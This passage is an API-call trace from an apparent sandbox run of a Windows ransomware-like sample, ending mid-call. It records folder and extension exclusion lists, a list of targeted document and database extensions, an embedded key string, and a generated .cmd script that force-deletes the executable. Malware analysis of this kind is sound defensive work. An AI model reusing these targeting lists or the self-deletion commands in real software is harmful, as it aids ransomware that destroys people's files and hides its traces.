[0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0093.822] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0093.822] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0093.822] LockResource (hResData=0x516f58) returned 0x516f58 [0093.822] FreeResource (hResData=0x516f58) 
returned 0 [0093.822] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.822] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.822] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.822] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d50b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d50b0, cbMultiByte=38, lpWideCharStr=0x14cde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.822] FreeResource (hResData=0x50d64c) returned 0 [0093.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d50b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] GetCurrentThreadId () returned 0xae8 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1464258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0093.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1464258, cbMultiByte=97, lpWideCharStr=0x1432ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 
[0093.822] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0093.822] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0093.822] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0093.823] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0093.823] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0093.823] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" 
[0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x14b0df0, dwCreationFlags=0x4, lpThreadId=0x14cdd84 | out: lpThreadId=0x14cdd84*=0xaf8) returned 0xb8 [0093.823] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0093.823] ResumeThread (hThread=0xb8) returned 0x1 [0093.823] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0096.638] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0096.638] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0096.639] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0096.639] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0096.639] LockResource (hResData=0x5187d4) returned 0x5187d4 [0096.639] FreeResource (hResData=0x5187d4) returned 0 [0096.639] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.639] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c 
[0096.639] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.639] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5120, cbMultiByte=38, lpWideCharStr=0x14cdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.639] FreeResource (hResData=0x50d64c) returned 0 [0096.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d5124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14cde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14cde48, cbMultiByte=83, lpWideCharStr=0x146012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0096.639] GetTickCount () returned 0x23265 [0096.639] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15342827274) returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="D畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="G畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="a畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="e畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="z畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="x畔﮴\x12\x1c翻") returned 1 [0096.639] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0096.639] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0096.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpszShortPath=0x146c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe") returned 0x30 [0096.640] CharUpperBuffW (in: lpsz="ping -n 3 
localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0096.640] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0096.640] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q 